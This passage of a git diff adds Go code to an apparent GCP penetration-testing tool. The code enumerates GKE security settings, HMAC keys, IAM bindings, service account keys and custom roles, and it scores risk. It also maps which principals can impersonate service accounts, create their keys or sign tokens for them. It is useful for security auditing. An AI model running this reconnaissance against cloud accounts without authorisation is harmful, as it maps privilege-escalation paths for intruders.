+ } + + // Count node pools and nodes + info.NodePoolCount = len(cluster.NodePools) + for _, np := range cluster.NodePools { + if np.Autoscaling != nil && 
np.Autoscaling.Enabled { + info.AutoscalingEnabled = true + } + info.TotalNodeCount += int(np.InitialNodeCount) + + // Get node service account from first pool + if info.NodeServiceAccount == "" && np.Config != nil { + info.NodeServiceAccount = np.Config.ServiceAccount + } + + // Check shielded node config + if np.Config != nil && np.Config.ShieldedInstanceConfig != nil { + info.SecureBoot = np.Config.ShieldedInstanceConfig.EnableSecureBoot + info.IntegrityMonitoring = np.Config.ShieldedInstanceConfig.EnableIntegrityMonitoring + } + } + + // GKE Autopilot mode + if cluster.Autopilot != nil { + info.Autopilot = cluster.Autopilot.Enabled + } + + // Node Auto-provisioning + if cluster.Autoscaling != nil { + info.NodeAutoProvisioning = cluster.Autoscaling.EnableNodeAutoprovisioning + } + + // Maintenance configuration + if cluster.MaintenancePolicy != nil && cluster.MaintenancePolicy.Window != nil { + window := cluster.MaintenancePolicy.Window + if window.DailyMaintenanceWindow != nil { + info.MaintenanceWindow = fmt.Sprintf("Daily at %s", window.DailyMaintenanceWindow.StartTime) + } else if window.RecurringWindow != nil { + info.MaintenanceWindow = fmt.Sprintf("Recurring: %s", window.RecurringWindow.Recurrence) + } + // Maintenance exclusions + for name := range window.MaintenanceExclusions { + info.MaintenanceExclusions = append(info.MaintenanceExclusions, name) + } + } + + // Addons configuration + if cluster.AddonsConfig != nil { + // Config Connector + if cluster.AddonsConfig.ConfigConnectorConfig != nil { + info.ConfigConnector = cluster.AddonsConfig.ConfigConnectorConfig.Enabled + } + // Note: IstioConfig was deprecated and removed from the GKE API + // Anthos Service Mesh (ASM) is now the recommended approach + } + + // Identify security issues + info.SecurityIssues = identifySecurityIssues(info) + + return info +} + +// parseNodePoolInfo extracts information from a node pool +func parseNodePoolInfo(np *container.NodePool, clusterName, projectID, location 
string) NodePoolInfo { + info := NodePoolInfo{ + ClusterName: clusterName, + Name: np.Name, + ProjectID: projectID, + Location: location, + Status: np.Status, + NodeCount: int(np.InitialNodeCount), + } + + if np.Config != nil { + info.MachineType = np.Config.MachineType + info.DiskSizeGb = np.Config.DiskSizeGb + info.DiskType = np.Config.DiskType + info.ImageType = np.Config.ImageType + info.ServiceAccount = np.Config.ServiceAccount + info.OAuthScopes = np.Config.OauthScopes + info.Preemptible = np.Config.Preemptible + info.Spot = np.Config.Spot + + if np.Config.ShieldedInstanceConfig != nil { + info.SecureBoot = np.Config.ShieldedInstanceConfig.EnableSecureBoot + info.IntegrityMonitoring = np.Config.ShieldedInstanceConfig.EnableIntegrityMonitoring + } + + // Analyze OAuth scopes for risky permissions + info.HasCloudPlatformScope, info.RiskyScopes = analyzeOAuthScopes(np.Config.OauthScopes) + } + + if np.Management != nil { + info.AutoRepair = np.Management.AutoRepair + info.AutoUpgrade = np.Management.AutoUpgrade + } + + return info +} + +// analyzeOAuthScopes identifies risky OAuth scopes +func analyzeOAuthScopes(scopes []string) (hasCloudPlatform bool, riskyScopes []string) { + riskyPatterns := map[string]string{ + "https://www.googleapis.com/auth/cloud-platform": "Full GCP access", + "https://www.googleapis.com/auth/compute": "Full Compute Engine access", + "https://www.googleapis.com/auth/devstorage.full_control": "Full Cloud Storage access", + "https://www.googleapis.com/auth/devstorage.read_write": "Read/write Cloud Storage", + "https://www.googleapis.com/auth/logging.admin": "Logging admin (can delete logs)", + "https://www.googleapis.com/auth/source.full_control": "Full source repo access", + "https://www.googleapis.com/auth/sqlservice.admin": "Cloud SQL admin", + } + + for _, scope := range scopes { + if scope == "https://www.googleapis.com/auth/cloud-platform" { + hasCloudPlatform = true + } + if desc, found := riskyPatterns[scope]; found { + riskyScopes 
= append(riskyScopes, fmt.Sprintf("%s: %s", scope, desc)) + } + } + + return +} + +// identifySecurityIssues checks for common security misconfigurations +func identifySecurityIssues(cluster ClusterInfo) []string { + var issues []string + + // Public endpoint without authorized networks + if !cluster.PrivateCluster && !cluster.MasterAuthorizedOnly { + issues = append(issues, "Public endpoint without master authorized networks") + } + + // Legacy ABAC enabled + if cluster.LegacyABAC { + issues = append(issues, "Legacy ABAC authorization enabled") + } + + // Basic auth enabled + if cluster.BasicAuthEnabled { + issues = append(issues, "Basic authentication enabled (deprecated)") + } + + // Client certificate + if cluster.IssueClientCertificate { + issues = append(issues, "Client certificate authentication enabled") + } + + // No network policy + if !cluster.NetworkPolicy { + issues = append(issues, "Network policy not enabled") + } + + // No workload identity + if cluster.WorkloadIdentity == "" { + issues = append(issues, "Workload Identity not configured") + } + + // Shielded nodes not enabled + if !cluster.ShieldedNodes { + issues = append(issues, "Shielded nodes not enabled") + } + + // Default service account on nodes + if cluster.NodeServiceAccount == "default" || + strings.HasSuffix(cluster.NodeServiceAccount, "-compute@developer.gserviceaccount.com") { + issues = append(issues, "Default service account used on nodes") + } + + // No release channel (manual upgrades) + if cluster.ReleaseChannel == "" || cluster.ReleaseChannel == "UNSPECIFIED" { + issues = append(issues, "No release channel configured") + } + + return issues +} + diff --git a/gcp/services/hmacService/hmacService.go b/gcp/services/hmacService/hmacService.go new file mode 100644 index 00000000..f7cc8981 --- /dev/null +++ b/gcp/services/hmacService/hmacService.go @@ -0,0 +1,159 @@ +package hmacservice + +import ( + "context" + "fmt" + "time" + + gcpinternal 
"github.com/BishopFox/cloudfox/internal/gcp" + "google.golang.org/api/storage/v1" +) + +type HMACService struct { + session *gcpinternal.SafeSession +} + +func New() *HMACService { + return &HMACService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *HMACService { + return &HMACService{session: session} +} + +// HMACKeyInfo represents a GCS HMAC key (S3-compatible access) +type HMACKeyInfo struct { + AccessID string `json:"accessId"` + ProjectID string `json:"projectId"` + ServiceAccountEmail string `json:"serviceAccountEmail"` + State string `json:"state"` // ACTIVE, INACTIVE, DELETED + TimeCreated time.Time `json:"timeCreated"` + Updated time.Time `json:"updated"` + Etag string `json:"etag"` + // Pentest-specific fields + IsActive bool `json:"isActive"` + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` +} + +// ListHMACKeys lists all HMAC keys in a project +func (s *HMACService) ListHMACKeys(projectID string) ([]HMACKeyInfo, error) { + ctx := context.Background() + var storageService *storage.Service + var err error + + if s.session != nil { + storageService, err = storage.NewService(ctx, s.session.GetClientOption()) + } else { + storageService, err = storage.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "storage.googleapis.com") + } + + var keys []HMACKeyInfo + + // List all HMAC keys for the project + req := storageService.Projects.HmacKeys.List(projectID) + err = req.Pages(ctx, func(page *storage.HmacKeysMetadata) error { + for _, key := range page.Items { + info := s.parseHMACKey(key, projectID) + keys = append(keys, info) + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "storage.googleapis.com") + } + + return keys, nil +} + +func (s *HMACService) parseHMACKey(key *storage.HmacKeyMetadata, projectID string) HMACKeyInfo { + info := HMACKeyInfo{ + AccessID: key.AccessId, + ProjectID: projectID, + ServiceAccountEmail: key.ServiceAccountEmail, 
+ State: key.State, + Etag: key.Etag, + IsActive: key.State == "ACTIVE", + RiskReasons: []string{}, + } + + // Parse timestamps + if key.TimeCreated != "" { + if t, err := time.Parse(time.RFC3339, key.TimeCreated); err == nil { + info.TimeCreated = t + } + } + if key.Updated != "" { + if t, err := time.Parse(time.RFC3339, key.Updated); err == nil { + info.Updated = t + } + } + + // Analyze risk + info.RiskLevel, info.RiskReasons = s.analyzeHMACKeyRisk(info) + + return info +} + +func (s *HMACService) analyzeHMACKeyRisk(key HMACKeyInfo) (string, []string) { + var reasons []string + score := 0 + + // Active keys are more risky + if key.IsActive { + reasons = append(reasons, "HMAC key is ACTIVE (can be used for S3-compatible access)") + score += 2 + } + + // Check key age + if !key.TimeCreated.IsZero() { + age := time.Since(key.TimeCreated) + if age > 365*24*time.Hour { + reasons = append(reasons, fmt.Sprintf("Key is over 1 year old (%d days)", int(age.Hours()/24))) + score += 2 + } else if age > 90*24*time.Hour { + reasons = append(reasons, fmt.Sprintf("Key is over 90 days old (%d days)", int(age.Hours()/24))) + score += 1 + } + } + + // Default compute SA HMAC keys are especially risky + if key.ServiceAccountEmail != "" { + if isDefaultComputeSA(key.ServiceAccountEmail) { + reasons = append(reasons, "HMAC key belongs to default compute service account") + score += 1 + } + } + + if score >= 4 { + return "HIGH", reasons + } else if score >= 2 { + return "MEDIUM", reasons + } else if score >= 1 { + return "LOW", reasons + } + return "INFO", reasons +} + +func isDefaultComputeSA(email string) bool { + // Check for default compute service account pattern + return len(email) > 0 && + (contains(email, "-compute@developer.gserviceaccount.com") || + contains(email, "@appspot.gserviceaccount.com")) +} + +func contains(s, substr string) bool { + return len(s) >= len(substr) && (s == substr || len(s) > 0 && containsSubstr(s, substr)) +} + +func containsSubstr(s, substr string) 
bool { + for i := 0; i <= len(s)-len(substr); i++ { + if s[i:i+len(substr)] == substr { + return true + } + } + return false +} diff --git a/gcp/services/iamService/iamService.go b/gcp/services/iamService/iamService.go index bf63c759..a3d222c1 100644 --- a/gcp/services/iamService/iamService.go +++ b/gcp/services/iamService/iamService.go @@ -4,104 +4,244 @@ import ( "context" "fmt" "strings" + "time" iampb "cloud.google.com/go/iam/apiv1/iampb" resourcemanager "cloud.google.com/go/resourcemanager/apiv3" resourcemanagerpb "cloud.google.com/go/resourcemanager/apiv3/resourcemanagerpb" "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + cloudidentity "google.golang.org/api/cloudidentity/v1" + crmv1 "google.golang.org/api/cloudresourcemanager/v1" + iam "google.golang.org/api/iam/v1" + "google.golang.org/api/iterator" + "google.golang.org/api/option" ) type IAMService struct { - // DataStoreService datastoreservice.DataStoreService + session *gcpinternal.SafeSession } +// New creates a new IAMService (legacy - uses ADC directly) func New() *IAMService { return &IAMService{} } +// NewWithSession creates an IAMService with a SafeSession for managed authentication +func NewWithSession(session *gcpinternal.SafeSession) *IAMService { + return &IAMService{session: session} +} + +// getClientOption returns the appropriate client option based on session +func (s *IAMService) getClientOption() option.ClientOption { + if s.session != nil { + return s.session.GetClientOption() + } + return nil +} + // AncestryResource represents a single resource in the project's ancestry. 
// AncestryResource represents a single resource (project, folder, or
// organization) in a project's ancestry chain.
type AncestryResource struct {
	Type string `json:"type"`
	Id   string `json:"id"`
}

// IAMCondition represents a parsed IAM condition (conditional access policy).
type IAMCondition struct {
	Title       string `json:"title"`
	Description string `json:"description"`
	Expression  string `json:"expression"`
}

// PolicyBinding represents one IAM policy binding: a role granted to a set of
// members on a resource, optionally gated by a condition and optionally
// inherited from a folder or organization.
type PolicyBinding struct {
	Role          string        `json:"role"`
	Members       []string      `json:"members"`
	ResourceID    string        `json:"resourceID"`
	ResourceType  string        `json:"resourceType"`
	PolicyName    string        `json:"policyBindings"`
	Condition     string        `json:"condition"`
	ConditionInfo *IAMCondition `json:"conditionInfo"` // Parsed condition details
	HasCondition  bool          `json:"hasCondition"`  // True if binding has conditions
	IsInherited   bool          `json:"isInherited"`   // True if inherited from folder/org
	InheritedFrom string        `json:"inheritedFrom"` // Source of inheritance (folder/org ID)
}

// PrincipalWithRoles aggregates every policy binding observed for a single
// principal (user, service account, group, ...) on a resource, plus
// service-account enrichment fields filled in by other lookups.
type PrincipalWithRoles struct {
	Name           string          `json:"name"`
	Type           string          `json:"type"`
	PolicyBindings []PolicyBinding `json:"policyBindings"`
	ResourceID     string          `json:"resourceID"`
	ResourceType   string          `json:"resourceType"`
	// Enhanced fields
	Email          string   `json:"email"`          // Clean email without prefix
	DisplayName    string   `json:"displayName"`    // For service accounts
	Description    string   `json:"description"`    // For service accounts
	Disabled       bool     `json:"disabled"`       // For service accounts
	UniqueID       string   `json:"uniqueId"`       // For service accounts
	HasKeys        bool     `json:"hasKeys"`        // Service account has user-managed keys
	KeyCount       int      `json:"keyCount"`       // Number of user-managed keys
	HasCustomRoles bool     `json:"hasCustomRoles"` // Has any custom roles assigned
	CustomRoles    []string `json:"customRoles"`    // List of custom role names
}

// ServiceAccountInfo represents detailed info about a service account,
// including its keys, roles, and who can impersonate it.
type ServiceAccountInfo struct {
	Email          string `json:"email"`
	Name           string `json:"name"` // Full resource name
	ProjectID      string `json:"projectId"`
	UniqueID       string `json:"uniqueId"`
	DisplayName    string `json:"displayName"`
	Description    string `json:"description"`
	Disabled       bool   `json:"disabled"`
	OAuth2ClientID string `json:"oauth2ClientId"`
	// Key information
	HasKeys  bool                    `json:"hasKeys"`
	KeyCount int                     `json:"keyCount"`
	Keys     []ServiceAccountKeyInfo `json:"keys"`
	// Role information
	Roles            []string `json:"roles"`
	HasCustomRoles   bool     `json:"hasCustomRoles"`
	CustomRoles      []string `json:"customRoles"`
	HasHighPrivilege bool     `json:"hasHighPrivilege"`
	HighPrivRoles    []string `json:"highPrivRoles"`
	// Pentest: Impersonation information
	CanBeImpersonatedBy    []string `json:"canBeImpersonatedBy"`    // Principals who can impersonate this SA
	CanCreateKeysBy        []string `json:"canCreateKeysBy"`        // Principals who can create keys for this SA
	CanGetAccessTokenBy    []string `json:"canGetAccessTokenBy"`    // Principals with getAccessToken
	CanSignBlobBy          []string `json:"canSignBlobBy"`          // Principals with signBlob
	CanSignJwtBy           []string `json:"canSignJwtBy"`           // Principals with signJwt
	HasImpersonationRisk   bool     `json:"hasImpersonationRisk"`   // True if any impersonation path exists
	ImpersonationRiskLevel string   `json:"impersonationRiskLevel"` // CRITICAL, HIGH, MEDIUM, LOW
}

// SAImpersonationInfo represents who can impersonate/abuse a service account,
// broken down by the specific IAM permission that enables the abuse path.
type SAImpersonationInfo struct {
	ServiceAccount     string   `json:"serviceAccount"`
	ProjectID          string   `json:"projectId"`
	TokenCreators      []string `json:"tokenCreators"`      // iam.serviceAccounts.getAccessToken
	KeyCreators        []string `json:"keyCreators"`        // iam.serviceAccountKeys.create
	SignBlobUsers      []string `json:"signBlobUsers"`      // iam.serviceAccounts.signBlob
	SignJwtUsers       []string `json:"signJwtUsers"`       // iam.serviceAccounts.signJwt
	ImplicitDelegators []string `json:"implicitDelegators"` // iam.serviceAccounts.implicitDelegation
	ActAsUsers         []string `json:"actAsUsers"`         // iam.serviceAccounts.actAs
	SAAdmins           []string `json:"saAdmins"`           // iam.serviceAccounts.* (full admin)
	RiskLevel          string   `json:"riskLevel"`
	RiskReasons        []string `json:"riskReasons"`
}

// ServiceAccountKeyInfo represents a service account key.
type ServiceAccountKeyInfo struct {
	Name         string    `json:"name"`
	KeyAlgorithm string    `json:"keyAlgorithm"`
	KeyOrigin    string    `json:"keyOrigin"` // GOOGLE_PROVIDED or USER_PROVIDED
	KeyType      string    `json:"keyType"`   // USER_MANAGED or SYSTEM_MANAGED
	ValidAfter   time.Time `json:"validAfter"`
	ValidBefore  time.Time `json:"validBefore"`
	Disabled     bool      `json:"disabled"`
}

// CustomRole represents a custom IAM role defined at project or org level.
type CustomRole struct {
	Name                string   `json:"name"`
	Title               string   `json:"title"`
	Description         string   `json:"description"`
	IncludedPermissions []string `json:"includedPermissions"`
	Stage               string   `json:"stage"` // ALPHA, BETA, GA, DEPRECATED, DISABLED
	Deleted             bool     `json:"deleted"`
	Etag                string   `json:"etag"`
	ProjectID           string   `json:"projectId"` // Empty if org-level
	OrgID               string   `json:"orgId"`     // Empty if project-level
	IsProjectLevel      bool     `json:"isProjectLevel"`
	PermissionCount     int      `json:"permissionCount"`
}

// GroupMember represents a member of a Google Group.
type GroupMember struct {
	Email      string `json:"email"`
	Type       string `json:"type"`       // USER, SERVICE_ACCOUNT, GROUP (nested)
	Role       string `json:"role"`       // OWNER, MANAGER, MEMBER
	Status     string `json:"status"`     // ACTIVE, SUSPENDED, etc.
	IsExternal bool   `json:"isExternal"` // External to the organization
}
+ IsExternal bool `json:"isExternal"` // External to the organization +} + +// GroupInfo represents a Google Group (for tracking group memberships) +type GroupInfo struct { + Email string `json:"email"` + DisplayName string `json:"displayName"` + Description string `json:"description"` + Roles []string `json:"roles"` // Roles assigned to this group + ProjectID string `json:"projectId"` + Members []GroupMember `json:"members"` // Direct members of this group + NestedGroups []string `json:"nestedGroups"` // Groups that are members of this group + MemberCount int `json:"memberCount"` // Total direct members + HasNestedGroups bool `json:"hasNestedGroups"` + MembershipEnumerated bool `json:"membershipEnumerated"` // Whether we successfully enumerated members +} + +// CombinedIAMData holds all IAM-related data for a project +type CombinedIAMData struct { + Principals []PrincipalWithRoles `json:"principals"` + ServiceAccounts []ServiceAccountInfo `json:"serviceAccounts"` + CustomRoles []CustomRole `json:"customRoles"` + Groups []GroupInfo `json:"groups"` + InheritedRoles []PolicyBinding `json:"inheritedRoles"` } -var logger internal.Logger +var logger = internal.NewLogger() -func projectAncestry(projectID string) ([]AncestryResource, error) { +func (s *IAMService) projectAncestry(projectID string) ([]AncestryResource, error) { ctx := context.Background() - projectsClient, err := resourcemanager.NewProjectsClient(ctx) + + // Use the v1 GetAncestry API which only requires project-level read permissions + // This avoids needing resourcemanager.folders.get on each folder in the hierarchy + var crmService *crmv1.Service + var err error + + if s.session != nil { + crmService, err = crmv1.NewService(ctx, s.session.GetClientOption()) + } else { + crmService, err = crmv1.NewService(ctx) + } if err != nil { - return nil, fmt.Errorf("failed to create projects client: %v", err) + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") } - defer 
projectsClient.Close() - foldersClient, err := resourcemanager.NewFoldersClient(ctx) + resp, err := crmService.Projects.GetAncestry(projectID, &crmv1.GetAncestryRequest{}).Context(ctx).Do() if err != nil { - return nil, fmt.Errorf("failed to create folders client: %v", err) + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") } - defer foldersClient.Close() - resourceID := "projects/" + projectID + // GetAncestry returns ancestors from bottom to top (project first, then parent folders, then org) + // We need to reverse to get org -> folders -> project order var ancestry []AncestryResource - - for { - if strings.HasPrefix(resourceID, "organizations/") { - ancestry = append(ancestry, AncestryResource{Type: "organization", Id: strings.TrimPrefix(resourceID, "organizations/")}) - break - } else if strings.HasPrefix(resourceID, "folders/") { - resp, err := foldersClient.GetFolder(ctx, &resourcemanagerpb.GetFolderRequest{Name: resourceID}) - if err != nil { - logger.ErrorM(fmt.Sprintf("failed to access folder %s, %v", resourceID, err), globals.GCP_IAM_MODULE_NAME) - break // Stop processing further if a folder is inaccessible - } - ancestry = append(ancestry, AncestryResource{Type: "folder", Id: strings.TrimPrefix(resp.Name, "folders/")}) - resourceID = resp.Parent - } else if strings.HasPrefix(resourceID, "projects/") { - resp, err := projectsClient.GetProject(ctx, &resourcemanagerpb.GetProjectRequest{Name: resourceID}) - if err != nil { - logger.ErrorM(fmt.Sprintf("failed to access project %s, %v", resourceID, err), globals.GCP_IAM_MODULE_NAME) - return nil, fmt.Errorf("failed to get project: %v", err) - } - ancestry = append(ancestry, AncestryResource{Type: "project", Id: strings.TrimPrefix(resp.Name, "projects/")}) - resourceID = resp.Parent - } else { - return nil, fmt.Errorf("unknown resource type for: %s", resourceID) + for i := len(resp.Ancestor) - 1; i >= 0; i-- { + ancestor := resp.Ancestor[i] + if ancestor.ResourceId != nil { + 
ancestry = append(ancestry, AncestryResource{ + Type: ancestor.ResourceId.Type, + Id: ancestor.ResourceId.Id, + }) } } - // Reverse the slice as we've built it from child to ancestor - for i, j := 0, len(ancestry)-1; i < j; i, j = i+1, j-1 { - ancestry[i], ancestry[j] = ancestry[j], ancestry[i] - } - return ancestry, nil } // Policies fetches IAM policy for a given resource and all policies in resource ancestry func (s *IAMService) Policies(resourceID string, resourceType string) ([]PolicyBinding, error) { ctx := context.Background() - client, err := resourcemanager.NewProjectsClient(ctx) + var client *resourcemanager.ProjectsClient + var err error + + if s.session != nil { + client, err = resourcemanager.NewProjectsClient(ctx, s.session.GetClientOption()) + } else { + client, err = resourcemanager.NewProjectsClient(ctx) + } if err != nil { - return nil, fmt.Errorf("resourcemanager.NewProjectsClient: %v", err) + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") } defer client.Close() @@ -124,7 +264,7 @@ func (s *IAMService) Policies(resourceID string, resourceType string) ([]PolicyB // Fetch the IAM policy for the resource policy, err := client.GetIamPolicy(ctx, req) if err != nil { - return nil, fmt.Errorf("client.GetIamPolicy: %v", err) + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") } // Assemble the policy bindings @@ -145,17 +285,50 @@ func (s *IAMService) Policies(resourceID string, resourceType string) ([]PolicyB } func determinePrincipalType(member string) string { - if strings.HasPrefix(member, "user:") { + switch { + case strings.HasPrefix(member, "user:"): return "User" - } else if strings.HasPrefix(member, "serviceAccount:") { + case strings.HasPrefix(member, "serviceAccount:"): return "ServiceAccount" - } else if strings.HasPrefix(member, "group:") { + case strings.HasPrefix(member, "group:"): return "Group" - } else { + case strings.HasPrefix(member, "domain:"): + return "Domain" + 
// determinePrincipalType classifies an IAM member string ("user:...",
// "serviceAccount:...", "allUsers", ...) into a display category.
// Unrecognized members yield "Unknown".
func determinePrincipalType(member string) string {
	// Exact-match member strings first.
	switch member {
	case "allUsers":
		return "PUBLIC"
	case "allAuthenticatedUsers":
		return "ALL_AUTHENTICATED"
	}

	// Prefix-based member kinds. "principalSet:" is listed before
	// "principal:" so the more specific prefix wins (the two never overlap,
	// but the ordering makes that explicit).
	prefixKinds := []struct{ prefix, kind string }{
		{"user:", "User"},
		{"serviceAccount:", "ServiceAccount"},
		{"group:", "Group"},
		{"domain:", "Domain"},
		{"deleted:", "Deleted"},
		{"projectOwner:", "ProjectOwner"},
		{"projectEditor:", "ProjectEditor"},
		{"projectViewer:", "ProjectViewer"},
		{"principalSet:", "WorkloadIdentityPool"},
		{"principal:", "WorkloadIdentity"},
	}
	for _, pk := range prefixKinds {
		if strings.HasPrefix(member, pk.prefix) {
			return pk.kind
		}
	}
	return "Unknown"
}

// extractEmail strips the "type:" prefix from an IAM member string and returns
// the bare identifier (email, domain, pool path). Members without a colon are
// returned unchanged.
func extractEmail(member string) string {
	if _, id, found := strings.Cut(member, ":"); found {
		return id
	}
	return member
}

// isCustomRole reports whether role is a user-defined (project- or
// organization-scoped) role rather than a Google predefined role.
func isCustomRole(role string) bool {
	return strings.HasPrefix(role, "projects/") ||
		strings.HasPrefix(role, "organizations/")
}
append(customRoles, pb.Role) + hasCustomRoles = true + } principalMap[member] = &PrincipalWithRoles{ Name: member, Type: principalType, + Email: extractEmail(member), PolicyBindings: []PolicyBinding{pb}, ResourceID: resourceID, ResourceType: resourceType, + HasCustomRoles: hasCustomRoles, + CustomRoles: customRoles, + } + } + } + } + + var principals []PrincipalWithRoles + for _, principal := range principalMap { + principals = append(principals, *principal) + } + + return principals, nil +} + +// contains checks if a string slice contains a specific string +func contains(slice []string, item string) bool { + for _, s := range slice { + if s == item { + return true + } + } + return false +} + +// ServiceAccounts retrieves all service accounts in a project with detailed info +func (s *IAMService) ServiceAccounts(projectID string) ([]ServiceAccountInfo, error) { + ctx := context.Background() + var iamService *iam.Service + var err error + + if s.session != nil { + iamService, err = iam.NewService(ctx, s.session.GetClientOption()) + } else { + iamService, err = iam.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") + } + + var serviceAccounts []ServiceAccountInfo + + // List all service accounts in the project + req := iamService.Projects.ServiceAccounts.List("projects/" + projectID) + err = req.Pages(ctx, func(page *iam.ListServiceAccountsResponse) error { + for _, sa := range page.Accounts { + saInfo := ServiceAccountInfo{ + Email: sa.Email, + Name: sa.Name, + ProjectID: projectID, + UniqueID: sa.UniqueId, + DisplayName: sa.DisplayName, + Description: sa.Description, + Disabled: sa.Disabled, + OAuth2ClientID: sa.Oauth2ClientId, + } + + // Get keys for this service account + keys, err := s.getServiceAccountKeys(ctx, iamService, sa.Name) + if err != nil { + // Log but don't fail - we might not have permission + parsedErr := gcpinternal.ParseGCPError(err, "iam.googleapis.com") + gcpinternal.HandleGCPError(parsedErr, 
logger, globals.GCP_IAM_MODULE_NAME, + fmt.Sprintf("Could not list keys for %s", sa.Email)) + } else { + saInfo.Keys = keys + // Count user-managed keys only + userManagedCount := 0 + for _, key := range keys { + if key.KeyType == "USER_MANAGED" { + userManagedCount++ + } + } + saInfo.KeyCount = userManagedCount + saInfo.HasKeys = userManagedCount > 0 + } + + serviceAccounts = append(serviceAccounts, saInfo) + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") + } + + return serviceAccounts, nil +} + +// getServiceAccountKeys retrieves keys for a service account +func (s *IAMService) getServiceAccountKeys(ctx context.Context, iamService *iam.Service, saName string) ([]ServiceAccountKeyInfo, error) { + var keys []ServiceAccountKeyInfo + + resp, err := iamService.Projects.ServiceAccounts.Keys.List(saName).Context(ctx).Do() + if err != nil { + return nil, err + } + + for _, key := range resp.Keys { + keyInfo := ServiceAccountKeyInfo{ + Name: key.Name, + KeyAlgorithm: key.KeyAlgorithm, + KeyOrigin: key.KeyOrigin, + KeyType: key.KeyType, + Disabled: key.Disabled, + } + + // Parse timestamps + if key.ValidAfterTime != "" { + if t, err := time.Parse(time.RFC3339, key.ValidAfterTime); err == nil { + keyInfo.ValidAfter = t + } + } + if key.ValidBeforeTime != "" { + if t, err := time.Parse(time.RFC3339, key.ValidBeforeTime); err == nil { + keyInfo.ValidBefore = t + } + } + + keys = append(keys, keyInfo) + } + + return keys, nil +} + +// CustomRoles retrieves all custom roles in a project +func (s *IAMService) CustomRoles(projectID string) ([]CustomRole, error) { + ctx := context.Background() + var iamService *iam.Service + var err error + + if s.session != nil { + iamService, err = iam.NewService(ctx, s.session.GetClientOption()) + } else { + iamService, err = iam.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") + } + + var customRoles []CustomRole + + // List 
project-level custom roles + req := iamService.Projects.Roles.List("projects/" + projectID) + req.ShowDeleted(true) // Include deleted roles for security awareness + err = req.Pages(ctx, func(page *iam.ListRolesResponse) error { + for _, role := range page.Roles { + customRole := CustomRole{ + Name: role.Name, + Title: role.Title, + Description: role.Description, + IncludedPermissions: role.IncludedPermissions, + Stage: role.Stage, + Deleted: role.Deleted, + Etag: role.Etag, + ProjectID: projectID, + IsProjectLevel: true, + PermissionCount: len(role.IncludedPermissions), + } + customRoles = append(customRoles, customRole) + } + return nil + }) + if err != nil { + // Don't fail completely - we might just not have access to list roles + parsedErr := gcpinternal.ParseGCPError(err, "iam.googleapis.com") + gcpinternal.HandleGCPError(parsedErr, logger, globals.GCP_IAM_MODULE_NAME, + fmt.Sprintf("Could not list custom roles for project %s", projectID)) + } + + return customRoles, nil +} + +// PoliciesWithInheritance fetches IAM policies including inherited ones from folders and organization +func (s *IAMService) PoliciesWithInheritance(projectID string) ([]PolicyBinding, error) { + ctx := context.Background() + + // Get project's ancestry + ancestry, err := s.projectAncestry(projectID) + if err != nil { + // If we can't get ancestry, just return project-level policies + gcpinternal.HandleGCPError(err, logger, globals.GCP_IAM_MODULE_NAME, + fmt.Sprintf("Could not get ancestry for project %s, returning project-level policies only", projectID)) + return s.Policies(projectID, "project") + } + + var allBindings []PolicyBinding + + // Get policies for each resource in the ancestry (org -> folders -> project) + for _, resource := range ancestry { + bindings, err := s.getPoliciesForResource(ctx, resource.Id, resource.Type) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_IAM_MODULE_NAME, + fmt.Sprintf("Could not get policies for %s/%s", resource.Type, 
resource.Id)) + continue + } + + // Mark inherited bindings + for i := range bindings { + if resource.Type != "project" || resource.Id != projectID { + bindings[i].IsInherited = true + bindings[i].InheritedFrom = fmt.Sprintf("%s/%s", resource.Type, resource.Id) + } + } + + allBindings = append(allBindings, bindings...) + } + + return allBindings, nil +} + +// policyCache caches successful policy lookups per resource +var policyCache = make(map[string][]PolicyBinding) + +// policyFailureCache tracks resources we've already failed to get policies for +var policyFailureCache = make(map[string]bool) + +// getPoliciesForResource fetches policies for a specific resource using the appropriate client +func (s *IAMService) getPoliciesForResource(ctx context.Context, resourceID string, resourceType string) ([]PolicyBinding, error) { + cacheKey := resourceType + "/" + resourceID + + // Check success cache first + if bindings, ok := policyCache[cacheKey]; ok { + return bindings, nil + } + + // Check failure cache - return permission denied without logging again + if policyFailureCache[cacheKey] { + return nil, gcpinternal.ErrPermissionDenied + } + + var resourceName string + + switch resourceType { + case "project": + var client *resourcemanager.ProjectsClient + var err error + if s.session != nil { + client, err = resourcemanager.NewProjectsClient(ctx, s.session.GetClientOption()) + } else { + client, err = resourcemanager.NewProjectsClient(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + defer client.Close() + + resourceName = "projects/" + resourceID + policy, err := client.GetIamPolicy(ctx, &iampb.GetIamPolicyRequest{Resource: resourceName}) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + bindings := convertPolicyToBindings(policy, resourceID, resourceType, resourceName) + policyCache[cacheKey] = bindings + return bindings, nil + + case "folder": 
